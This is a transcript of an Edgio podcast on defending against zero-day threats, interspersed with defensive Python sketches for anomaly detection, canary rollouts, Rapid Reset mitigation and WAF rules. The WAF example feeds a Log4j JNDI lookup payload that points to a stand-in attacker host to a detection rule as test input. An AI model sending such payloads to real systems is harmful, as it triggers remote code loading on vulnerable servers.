An Introduction to Edgio's Beyond the Edge Podcast Episode 5: Identifying and Mitigating Zero-Day Threats, hosted by Andrew Johnson, Sr. Product Marketing Manager – Security at Edgio.
Andrew Johnson: Welcome to Beyond the Edge, where we dig into the ins and outs of the trends affecting modern digital businesses. I'm Andrew Johnson, your co-pilot for this episode, and today we're exploring the topic of zero-day threats, specifically how we identify and mitigate them. Joining us today are Dave Andrews, Edgio's VP of Engineering, and Marcel Flores, lead research scientist at Edgio.
Welcome, Dave. And Marcel, it’s great to have both of you here. Can you tell us a little bit about yourselves and your roles here at Edgio?
Dave Andrews: Sure. Thanks for having us, Andrew. It's a pleasure to be on. So I am VP of Engineering. I've been at Edgio for, I think, just a shade over 11 years, and I'm responsible for the edge platforms and a lot of the central infrastructure from an engineering perspective.
Andrew Johnson: Awesome. Thank you.
Marcel Flores: Yeah. Thanks so much for having us. As you said, I’m Marcel Flores. I’m the lead research scientist at Edgio Labs, the research group here at Edgio. My team works on improving the performance, reliability, and operations of the network by performing rigorous research and development, as well as engaging with the broader systems and networking research community.
What is a Zero-Day?
Andrew Johnson: Awesome. Thanks again for joining us today, guys. So on the topic of zero-day threats, I think it's important to quickly give our audience a background on what zero-day vulnerabilities and attacks are. I'll briefly try to cover that before we get into some of your experiences protecting Edgio and our customers. So what is a zero-day, in terms of what we're talking about here? Well, basically, modern apps, modern businesses, and modern services are made up of software: software from open-source code, commercial code bases, different protocols, etc. We know that no software is perfect, and from time to time, vulnerabilities are going to be detected in that code. Basically, "zero day" refers to the window between when a vulnerability is discovered and when a patch or workaround is available, right?
So, developers, once they know about a vulnerability, are going to try to patch it as quickly as possible or give customers and users of that software steps they can take to prevent the exploit. But like I mentioned, it's a problem that isn't going away. We see the number of CVEs, or Common Vulnerabilities and Exposures, increasing every year, with about a 25% increase in 2022 compared to 2021. It's not super surprising that more vulnerabilities are going to get spotted. There are AI tools that can scan code bases quickly, and there are certainly financial incentives for both good actors and bad actors to find these vulnerabilities. On the good actor side, there are bug bounty programs.
You're familiar with Apple pushing out code fixes for your iPhone all the time. Good white hat researchers are submitting exploits to these developers, and then there are bad actors that are exploiting vulnerabilities as well. So, just a little bit of background on that. Maybe some common ones you've heard of recently: HTTP2/Rapid Reset was a very notable thing in the application security world recently. Maybe you've heard of Log4j, Spring4Shell, or, a few years back, the Apache Struts 2 vulnerability that caused massive data breaches here in the United States and, actually, around the world. So that's just a little bit of background on zero-day threats, but yeah, maybe I'll go ahead and start by asking Dave a little bit about what you guys do to protect Edgio and our customers from zero-day threats.
How Does Edgio Protect Itself and Its Customers from Zero-Day Threats?
Dave Andrews: Yeah, absolutely. So security, I think, is all about defense in depth, right? There's never any one particular thing that you do. It's more about making sure that you have a number of layers all strung together. The idea is that if one or two layers are imperfect, as they all are because we have very intelligent humans actively trying to break them, the sheer number of layers with overlapping protections and mitigations means it doesn't matter if one thing fails, because there are five other things sitting there that will protect you. So, taking a step back, the first, and I think arguably one of the most important, things generally falls into the bucket of preparedness.
There are at least three separate aspects to that. The first one that springs to mind for me is hygiene. Having good security hygiene is absolutely critical, and it really helps largely by reducing your area of concern. So what do I mean by hygiene? There are two primary things. One is keeping software up to date, or regular patching. This is the most boring thing in the world. It's also arguably one of the best, most critical lines of defense. It means you take advantage of all of the responsible disclosures that you were talking about, Andrew: the good white hat researchers finding vulnerabilities, disclosing them to vendors, and the vendors fixing them and rolling out fixes.
You get to take advantage of fixes for basically all of the known attack vectors in the software that you're using. Just because it's boring does not necessarily mean that it's easy. Especially when you're working at the scale that we are at Edgio, as well as a number of other places, it's very, very difficult to manage the risk that comes with upgrading all of your software on a regular basis. So, as we'll see later on, there are a lot of things that we do operationally to make that safer and easier to do. But it still falls pretty squarely into the hygiene bucket, if you will. The next piece that lands within hygiene is scanning, where the whole point is actively looking for indications that you've got an issue before a bad actor finds it.
So this takes a number of forms. It can be internal security teams or information security teams, you can hire external parties to perform scans, or it can be both. Often, organizations leverage bug bounties to encourage people to take the white hat route: find vulnerabilities and disclose them to us, or to the particular party, so that they can be fixed before they're actively exploited. So those things fall into this bucket of: anything that you can fix, fix that first, right? Take advantage of the good work that the entire community is doing to make the internet and software in general more secure, and then actively look at your own applications, trying to find vulnerabilities and proactively fix them as best you're able. The next area of preparedness, which I'm going to turn over to Marcel, is observability.
Marcel Flores: Yeah, thanks Dave. So I think another important thing to be able to do in a lot of these cases is to be able to see what’s going on your network or with your infrastructure. So I think this kind of falls into to two categories that are fundamentally approached the same, but I think are important to call out. The first is to sort of think about application-level behaviors, right? Making sure that you understand what requests are coming into your network and sort of what the features are of those requests, how they’re shaped and what they look like normally and what they might look like during certain events. I think it’s also important, to keep in mind that whenever you’re communicating on the internet, right, it’s a sort of full stack operation, right?
Each request is going to pass through both the application layer and the lower-level protocols. And so it's important to keep an eye on what's going on further down the stack, right? And understand that there may be complex behaviors and responses from lower-level systems that aren't well captured in those application-layer behaviors. So it's important to keep track of both components and to have observability into what's going on in both cases. And I think a key piece is being able to understand when that traffic changes, right? When your traffic defies expectations, you might start seeing features of application requests that aren't what you normally see. For example, a sudden increase in HTTP POSTs as opposed to GETs at the application layer. Or something at the protocol level, right?
That may be something very intricate in a protocol like HTTP2, or something even lower: thinking about what's happening to the TCP sockets and what's going on with the protocol interactions at that level, especially when you're thinking about things like DDoS attacks that might try to exploit particular vulnerabilities. I think key to this observability is not only having metrics that allow you to see what's going on, but also having the ability to dig into these behaviors, right? And to segment them accordingly, to understand if there's a particular user population that's generating a certain set of traffic, whether it's specific networks, specific customers, or a specific property of a certain customer. So you can understand and narrow down where things are actually happening and how they might be happening.
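As a concrete illustration of the kind of application-layer check Marcel is describing, here is a minimal sketch of flagging a time window where the share of POST requests drifts away from a rolling baseline and then segmenting the anomaly by client network. The field names, thresholds, and input format are hypothetical, not Edgio's actual telemetry pipeline.

```python
# Minimal sketch: flag time windows where the HTTP method mix defies expectations.
# Field names, thresholds, and the input format are illustrative assumptions,
# not Edgio's actual telemetry pipeline.
from collections import Counter, deque

class MethodMixDetector:
    def __init__(self, baseline_windows=30, max_deviation=0.15):
        self.history = deque(maxlen=baseline_windows)  # recent POST shares
        self.max_deviation = max_deviation             # allowed drift from the baseline

    def observe_window(self, requests):
        """requests: list of dicts like {"method": "GET", "client_asn": 64512, ...}"""
        requests = list(requests)
        counts = Counter(r["method"] for r in requests)
        total = sum(counts.values()) or 1
        post_share = counts.get("POST", 0) / total

        baseline = sum(self.history) / len(self.history) if self.history else post_share
        anomalous = abs(post_share - baseline) > self.max_deviation
        self.history.append(post_share)

        if anomalous:
            # Segment the anomaly so an operator can narrow it down, e.g. by client network.
            by_asn = Counter(r.get("client_asn") for r in requests if r["method"] == "POST")
            return {"post_share": post_share, "baseline": baseline,
                    "top_post_asns": by_asn.most_common(5)}
        return None
```

The same pattern applies one layer down the stack: counting protocol-level events such as new streams or resets per connection instead of HTTP methods.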
Andrew Johnson: That's interesting. So after you observe these different types of behavior, or something you think might be a zero-day, what are some of the steps operationally that you can take?
What Steps Can You Take to Mitigate Zero-Day Threats?
Dave Andrews: Yeah, I can take that one, Andrew. The two elements that Marcel was talking about are really the foundations, right? The first one is looking at trends, which boils down, from one perspective, to looking at things in aggregate. The whole point there is you get a high-level view of what's going on, and it lets you identify changes very, very quickly, as you said. The second part, the deep diving, is actually being able to tease out and develop your understanding of what changed, what level it is operating at, and whether it is a risk, right? The internet is the wild, wild west. Things change all the time.
New behaviors are happening all the time, and not all of those things are a security issue, right? So having a much broader, aggregated set of information that lets you dig in and answer questions that are much more nuanced lets you get to the heart of what has changed and why, and lets you make that decision: oh my goodness, this is fine, it's a new customer doing something; or, this is actually an issue and we need to go look. So stepping away from seeing what has happened and developing some understanding of whether it's an issue, you get into the realm of: great, then what?
What do you do about it? This falls into a bucket that we call operational agility. There are a few high-level themes that we think through when we consider operational agility; again there are three, and those are responsiveness, safety, and redundancy. So just spending a little bit of time on each of those: responsiveness is exactly what it sounds like, right? When something is going wrong from a security perspective, time is of the essence. You want to be able to close security issues very, very quickly to give the attackers minimal time to wreak havoc and give you the maximum amount of time to clean up. So what we target, in a very broad sense, not only around security issues but around all kinds of operational changes we make, is around five seconds to reach 99.99% of the infrastructure.
That's the goal. We don't always get there because some things necessarily take longer, but that is the target, and a lot of our subsystems do meet that target. Safety is a weird kind of theme to think about with operational agility, so let me tease that one apart a little bit. One of the risks that you have when you're trying to do something with a high level of responsiveness, i.e. very, very quickly, is that you could fix the problem very, very quickly, assuming that you have perfect observability, a perfect understanding of exactly what's happening, and the ability to perfectly predict the response to the change that you're about to make. That's great, and a lot of the time that's the case. However, there's also the chance that your understanding of any of those things is imperfect, and you may well make it worse, also very, very quickly.
Nobody wants that. So the whole point about safety is that you put systems in place, and processes, and automation, and a lot of other things, to make sure that you don't, in fact, make it worse. That boils down to a couple of very, very high-level things. At the start, it's proactive modeling. This applies really heavily to basic capacity planning, right? For example, you may have to take machines out of production to patch them because the patch requires services to be restarted. One of the risks there, if you try to do that very, very quickly, is that you take too many machines out of production for the load that they're currently experiencing. You can know that ahead of time, right?
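To make that concrete, here is a minimal, hypothetical sketch of that kind of pre-flight capacity check: before a workflow drains a server for patching, it verifies that the servers left in production can still absorb the current load with some headroom. The names and the 30% headroom figure are illustrative assumptions, not Edgio's actual workflow tooling.

```python
# Hypothetical sketch of a capacity "safety gate" for a patching workflow.
# Names and the 30% headroom figure are illustrative assumptions.
from dataclasses import dataclass

@dataclass
class Server:
    name: str
    capacity_rps: float      # requests per second this server can absorb
    in_production: bool = True

def can_drain(server: Server, site_servers: list[Server],
              current_load_rps: float, headroom: float = 0.30) -> bool:
    """Allow draining only if the remaining in-production servers at this site
    can carry the current load with headroom to spare."""
    remaining = sum(s.capacity_rps for s in site_servers
                    if s.in_production and s is not server)
    return remaining >= current_load_rps * (1.0 + headroom)

def drain_for_patching(site_servers: list[Server], current_load_rps: float):
    """Walk the site and drain only as many servers as the safety gate allows."""
    for server in site_servers:
        if can_drain(server, site_servers, current_load_rps):
            server.in_production = False   # hand off to the patching workflow
            yield server
        # otherwise skip for now; a later pass picks it up once others are back
```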
So we have a lot of modeling systems that integrate with workflow systems, so that when a request to patch everything as fast as you can goes out, it doesn't immediately pull all servers out of production. There are basic safety systems that you can build and integrate to prevent yourself from shooting yourself in the foot. And, assuming that we're not going to make things worse from that pure capacity planning and infrastructure perspective, we also want to know that the change that we're making has the intended effect at whatever level we're trying to mitigate, whether that's the application or the protocol. To do that, we leverage a system that we call coal mine. We've blogged about it and spoken about it publicly before, but the idea there is that basically everything goes out as what we call a canary – canaries in the coal mine.
The point there is that nothing happens globally all at once, no matter how dire it is. There are a minimum of two phases for something to go out. So we put it on a subset of infrastructure, typically the infrastructure that is experiencing the event most egregiously or where it is most visible. We validate that it does what we expect, and then we very quickly roll it out more broadly and validate that the overall problem resolves at a global level. Coal mine and canaries are tightly integrated with our metrics and observability systems, so that you can correlate at a glance: what is this canary doing to the aggregated metrics that I'm looking at? So we get real-time feedback that, hey, the change we're making is in fact addressing the problem.
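Reduced to a sketch, that flow looks roughly like the following: push the change to a small canary slice, check the metrics you care about, and only then go global. The deploy, rollback, and error-rate callables, the 10% slice, and the thresholds below are hypothetical simplifications, not coal mine's real interface.

```python
# Hypothetical two-phase "canary in the coal mine" rollout, heavily simplified.
# The deploy/rollback/error_rate callables and all thresholds are illustrative
# assumptions, not coal mine's real interface.
import time

def rollout_with_canary(fleet, deploy, rollback, error_rate,
                        canary_fraction=0.10, soak_seconds=300,
                        max_error_increase=0.02):
    """Phase 1: push to a small canary slice and watch metrics.
    Phase 2: only if the canary looks healthy, push to the rest of the fleet."""
    split = max(1, int(len(fleet) * canary_fraction))
    canary, rest = fleet[:split], fleet[split:]

    baseline = error_rate(fleet)        # aggregate view before the change
    deploy(canary)                      # phase 1: canary slice only
    time.sleep(soak_seconds)            # let metrics accumulate

    observed = error_rate(canary)
    if observed > baseline + max_error_increase:
        rollback(canary)                # the change made things worse: stop here
        raise RuntimeError(f"canary failed: {observed:.3f} vs baseline {baseline:.3f}")

    deploy(rest)                        # phase 2: global rollout
```

The automated metric analysis Dave describes next essentially replaces the simple threshold comparison here with proper statistical checks.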
That real-time feedback is very, very handy. What we're actually working on at the moment and getting ready to launch internally, and later on we'll productize it for customers and their configuration changes, is basically fully automated metric analysis. Currently, when we make a change like this, it requires a human to sit there and look at it, make sure that the correct thing is happening, and make sure that the metrics they're concerned about are moving in the right direction, and then advance the canary: tell the system, great, you've passed the first phase, everything looks good, go ahead and go to the global phase of that canary. We leverage this system for all changes, not just security-related operational changes, but all changes that flow through the system.
And what we're bumping into is that as we build more and more visibility, to Marcel's point, more and more metrics, more and more information about what's happening, there's more and more for the humans to look at, right? And that load is reaching the point where it is too high, and humans are starting to make mistakes, because there are simply too many charts and graphs to look at, people get tired, and people are imperfect anyway. So we're launching a system called Birdwatcher, the thing that watches the canaries, basically, which does some sophisticated statistical analysis on the metrics as the changes are rolling out and gives a thumbs up or a thumbs down. And that's integrated with coal mine so that, in an automated way, we get some indication that the canary is good and it's doing what we expect.
And also, separately, that it's not doing anything bad that we don't expect, and that the rollout will proceed without any human intervention. So I'm super excited about that. That's going to make our responsiveness even faster and even safer. Those are the main things that we consider when we're talking about safety: being able to quickly and safely make the problem go away. The final point that I mentioned was redundancy, which is relatively self-explanatory. There's a key philosophy that we leverage and deploy, which is basically dual path for a lot of these changes, as many as we can muster. What dual path means is that the two paths we think through are basically fast but best-effort, and slow but reliable. The idea there being, we operate a large amount of infrastructure in very, very disparate places all around the world.
The ability to hit everything with a hundred percent reliability in a few seconds is a fairy tale. That's not something that is feasibly possible. Something somewhere is always having an issue, and there's not really anything you can do about that. So what we do is basically layer these things together, similar to defense in depth in security, right? You put these two things together, and what this actually looks like is leveraging the fast path to go hit as much as you possibly can, and then, for anything that you miss, we make sure we have a redundant, reliable path that will keep retrying until it works, but that is a little bit slower. So to put some numbers to that, the fast path will make a change on approximately 99.9% of our infrastructure in sub-five seconds, right?
And that 99.9% is repeatable and reliable. The slow, reliable path runs on the order of 60 seconds, and that system will keep trying until it succeeds. So by leveraging these two together, we get the best of both worlds, and if one of those subsystems completely goes down, it doesn't mean that everything is down; we'll still be where we need to be a maximum of five minutes later. Those two things together give us the responsiveness and agility with the reliability that we're looking for. There are other fun little things to make sure that we have some redundancy, like how you kick these systems off. A lot of systems have chatbots integrated, so it's very, very easy.
Anyone can do it from anywhere in the world on their phone. A lot of other things have APIs, and there's a CLI for a lot of the subsystems. So making sure that there's not just one way to kick these tasks off is another example of how we try to build in redundancy, so that we always have that operational agility at our fingertips irrespective of what's happening or which particular system might be experiencing an issue. We make sure that we have the control and the operational ability that we need. A lot of these things are general purpose, but like I said, we leverage them for as much as we possibly can, everything from our own infrastructure workflows, like taking a machine out of production and patching it, all the way through to customer configuration changes. It all leverages the same core systems, which we dogfood aggressively ourselves, so the product that we expose to our customers is reliable and very, very solid.
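A minimal sketch of the dual-path idea Dave describes above: a fast, best-effort fan-out backed by a slower path that retries until every server has the change. The push callables, worker counts, and timings are hypothetical, not the actual propagation systems.

```python
# Hypothetical sketch of dual-path change propagation:
# a fast, best-effort fan-out backed by a slower path that retries until success.
# The push callables, worker count, and retry interval are illustrative assumptions.
import time
from concurrent.futures import ThreadPoolExecutor

def propagate_change(change, servers, fast_push, reliable_push, retry_interval=60):
    """fast_push/reliable_push: callables taking (server, change), returning True on success."""
    # Fast path: hit as many servers as possible in parallel, tolerating failures.
    with ThreadPoolExecutor(max_workers=64) as pool:
        results = list(pool.map(lambda s: (s, fast_push(s, change)), servers))
    missed = [s for s, ok in results if not ok]

    # Slow path: keep retrying the stragglers until every one of them has the change.
    while missed:
        time.sleep(retry_interval)
        missed = [s for s in missed if not reliable_push(s, change)]
```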
Andrew Johnson: Awesome. Appreciate that, Dave. And Marcel, I think you talked about best practices and considerations that security teams can apply to their own practice; appreciate those tips. I know you guys have definitely dealt with some really interesting zero-day examples in the wild while protecting Edgio and our customers, so I'm sure you have some good stories and applications of these best practices. Would you be able to talk a little bit about that?
Zero-Day Examples: HTTP2/Rapid Reset
Dave Andrews: Yeah, absolutely. I think the one that's most pertinent, or most recent I guess, and that was kind of interesting, is one you mentioned earlier: the HTTP2/Rapid Reset attack. That was a very interesting experience. Just to relay it from Edgio's perspective, there's a little blog that we wrote up on this as it happened. HTTP2/Rapid Reset was a zero-day attack where people realized that the implementations of most HTTP2 server libraries had taken something in the HTTP2 RFC, the protocol specification, that was a general recommendation and basically codified it in the libraries themselves. And that was the number of concurrent streams that were allowed to be in flight on a particular connection, which was written in the spec as being a hundred.
That, coupled with an interesting little facet of H2, which is the idea of multiplexing lots and lots of requests on a single TCP socket, plus the ability to cancel requests, led to this very, very interesting DDoS vulnerability. What the attackers are looking for is something that costs a small amount for the attacker and costs more for the person on the other end, and they found it in HTTP2/Rapid Reset. What that basically meant was the attacker could very quickly cram the initiation of a request and then its cancellation, over and over and over, hundreds of those, into a single packet and send it to the server.
The server then has to do a lot more work than just sending a single packet. We have to create a request; oftentimes we have to initiate a proxy connection, which is what CDNs do to go and fetch whatever asset the attacker was requesting; and then finally we have to log that the request happened. The attackers were able to generate those initiations and cancellations of requests very, very quickly, and for basically anyone who came under that attack, it was more expensive to process them than it was to generate them. And so that becomes a DDoS vulnerability. So we, like lots of other folks in the industry, were attacked by that.
And everyone was attacked at around the same time, which made it particularly interesting. It was a very broad attack, and I would love to understand what the attackers were thinking when they started it, because they were attacking many, many providers all at the same time. We discovered that when we started talking to the other providers: oh, when did you see this? Oh, that's exactly the same time that we saw it. We stumbled into that because we found the attack ourselves: we identified what was happening because of the observability that Marcel was talking about, and we started building mitigations, right? That mitigation looked like adding even more observability to get at the heart of exactly what was happening, and then building operational controls that let us tweak a response to it.
What that actually looked like was: keep track of how many times any client is resetting requests on a particular socket, and if the percentage goes above a predefined threshold, terminate that connection. The idea is basically to not allow the attacker to continually send these requests, to put a cap on it, and hence be able to mitigate the attack. We published that blog after we'd built that mitigation, deployed it, enacted it, and validated that it was in fact preventing those attacks from recurring. Then we had folks from the industry reach out: oh, we saw the blog, we were actually also impacted by that, and we're working on responsible disclosure. So we folded in with a group from the industry and worked with VINCE, which is part of the CERT, to go through the responsible disclosure flow and make sure that, in this case, the folks who were implementing HTTP2 libraries or HTTP servers had time to generate and deploy patches before the vulnerability was more widely publicized.
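Reduced to a sketch, that mitigation is a per-connection counter: track what share of a client's streams end in a reset and tear the connection down once that share crosses a threshold. The class below is a hypothetical illustration, not Edgio's production code, and the threshold and minimum sample size are made up.

```python
# Hypothetical per-connection guard against HTTP2 Rapid Reset-style abuse.
# The threshold and minimum sample size are illustrative assumptions.
class ConnectionResetGuard:
    def __init__(self, max_reset_ratio=0.5, min_streams=50):
        self.streams = 0
        self.resets = 0
        self.max_reset_ratio = max_reset_ratio
        self.min_streams = min_streams   # don't judge a connection on a handful of streams

    def on_stream_open(self):
        self.streams += 1

    def on_stream_reset(self):
        self.resets += 1

    def should_terminate(self) -> bool:
        """True once the client has opened enough streams and most of them were reset."""
        if self.streams < self.min_streams:
            return False
        return (self.resets / self.streams) > self.max_reset_ratio
```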
So it was a very, very interesting flow. We were able to turn that around very quickly, in part because of the work that we do on hygiene and operational visibility and agility; we only had a very small change to make. It wasn't, oh my goodness, we have to upgrade this library and we're 10 versions behind because we don't regularly update it. It was, actually, we're one version behind, because we regularly patch and upgrade, so the risk is reduced because it's a small hop, which means you can do it very quickly whilst maintaining that low-risk threshold that we have. So we did that very, very quickly and were able to roll it out and mitigate the attack. And then we put up the blog, without knowing that the attack had hit more people, in part to socialize it with not only our customers but the industry: hey, this is something weird that we saw, which looks like it's nothing specific to Edgio and is in fact potentially more widely applicable. And it turned out that it was.
Andrew Johnson: That's really interesting. Kind of cool to see an inside view of the security community across the globe working together to improve outcomes for everyone. Marcel, did you want to add anything around this?
Marcel Flores: Yeah, I just wanted to add a note that I think this example was an interesting one in which the initial observability that we had definitely showed strange behaviors, as Dave was describing, right? This interaction of a lower-level protocol feature with the higher-level behaviors of the CDN created some really unexpected behaviors. And part of figuring out what was going on here was understanding that there was this severe imbalance, right? The number of requests we were seeing versus the number of requests we were actually delivering back to clients was skewed, and that stood out. Even though those were both metrics we had been collecting, we hadn't been comparing them in exactly that way. So part of the outcome of this was to sit down and say, hey, how can we combine the visibility we already have into something that is tailor-made for detecting this issue? And we were able to do exactly that, and improve the scope of our visibility by looking at the data we already had through a slightly different lens.
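As a hypothetical illustration of that "same data, different lens" idea: two counters of the kind a CDN already collects, streams opened versus responses delivered, combined into a single ratio that makes the imbalance jump out. The names and the alert threshold below are assumptions, not the actual metrics.

```python
# Hypothetical sketch: combine two existing fleet-level counters into a new signal.
# The metric names and the alert threshold are illustrative assumptions.
def request_delivery_skew(streams_opened: int, responses_delivered: int) -> float:
    """Ratio of opened streams to delivered responses; roughly 1.0 is normal,
    a large value means many requests never produced a response (e.g. mass resets)."""
    return streams_opened / max(responses_delivered, 1)

def window_is_skewed(streams_opened: int, responses_delivered: int,
                     alert_threshold: float = 3.0) -> bool:
    """True if this time window looks imbalanced enough to investigate."""
    return request_delivery_skew(streams_opened, responses_delivered) > alert_threshold
```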
Andrew Johnson: Awesome. That's good to keep in mind, and thank you for that, Marcel. Yeah, guys, I think we're wrapping up. Are there any additional recommendations you want to share? I think we covered some very good ones at a high level.
Recommendations for Strengthening Your Security Posture
Dave Andrews: Good question. I think a general recommendation is that hygiene is critically important, along with focusing on your observability. The thing that I would call out is: find people who can help, right? Part of the critical value proposition that a company like Edgio provides is that we can definitely help. You have a whole team of people like myself and Marcel who are working on this and working on proactively preventing whole classes of attacks from impacting folks. So find people who can help; there's a bunch of tools and technology that we build, and that the community has available, that can make your job easier. When we're talking generally about things on the internet, a WAF is the most basic, and I would argue also the most critical, example of something like that.
If it's implemented appropriately, it gives you the ability to combine the agility and the safety elements together. The Edgio WAF runs in a dual mode, which means you can deploy new rules to production, to the actual machines that are observing the traffic, and you can see what is happening. A good example of that was with Log4j, going back in time a little bit. When we developed the response to that, we were able to develop the rule very, very quickly and validate it very, very quickly, because we were pushing rule updates and able to deploy them in alert mode on the actual machines, see that they matched the attacks, and show our customers whether or not they were getting attacked. And then we could make a very data-driven decision to move that rule into blocking mode and actually prevent those attacks from making it through to our customers. So it combines all of those things together: speed of responsiveness, safety, redundancy, and reliability. Get people who can help, I think, would be my key recommendation.
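To illustrate the alert-then-block pattern Dave describes, here is a hypothetical sketch of a rule lifecycle: a new rule first runs in alert mode, where matches are only counted and logged, and is promoted to blocking mode once the match data supports it. The rule structure, pattern, and names are assumptions, not the Edgio WAF's actual API.

```python
# Hypothetical illustration of a WAF rule lifecycle: deploy in alert mode first,
# then promote to blocking once the match data supports it.
# Rule structure, pattern, and names are assumptions, not the Edgio WAF's API.
import re
from enum import Enum

class Mode(Enum):
    ALERT = "alert"    # log matches, let the request through
    BLOCK = "block"    # reject matching requests

class WafRule:
    def __init__(self, name: str, pattern: str, mode: Mode = Mode.ALERT):
        self.name = name
        self.pattern = re.compile(pattern)
        self.mode = mode
        self.matches = 0

    def evaluate(self, request_body: str) -> bool:
        """Returns True if the request should be blocked."""
        if self.pattern.search(request_body):
            self.matches += 1            # evidence for the promote-to-block decision
            return self.mode is Mode.BLOCK
        return False

# Example: a crude Log4j-style lookup pattern, deployed in alert mode first.
rule = WafRule("jndi-lookup", r"\$\{jndi:", Mode.ALERT)
rule.evaluate("${jndi:ldap://attacker.example/a}")   # counted and logged, not blocked
rule.mode = Mode.BLOCK                               # promoted after reviewing match data
```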
Andrew Johnson: That makes a lot of sense. I appreciate that, Dave. Yeah, when responding to zero-days, time is critical, so having these specialized solutions, but also, more importantly, the people that can help you through this, is key to closing that door on attackers. So with that, guys, thank you very much for joining us. I'd like to thank the audience as well, and we'll see you on the next episode. Thank you.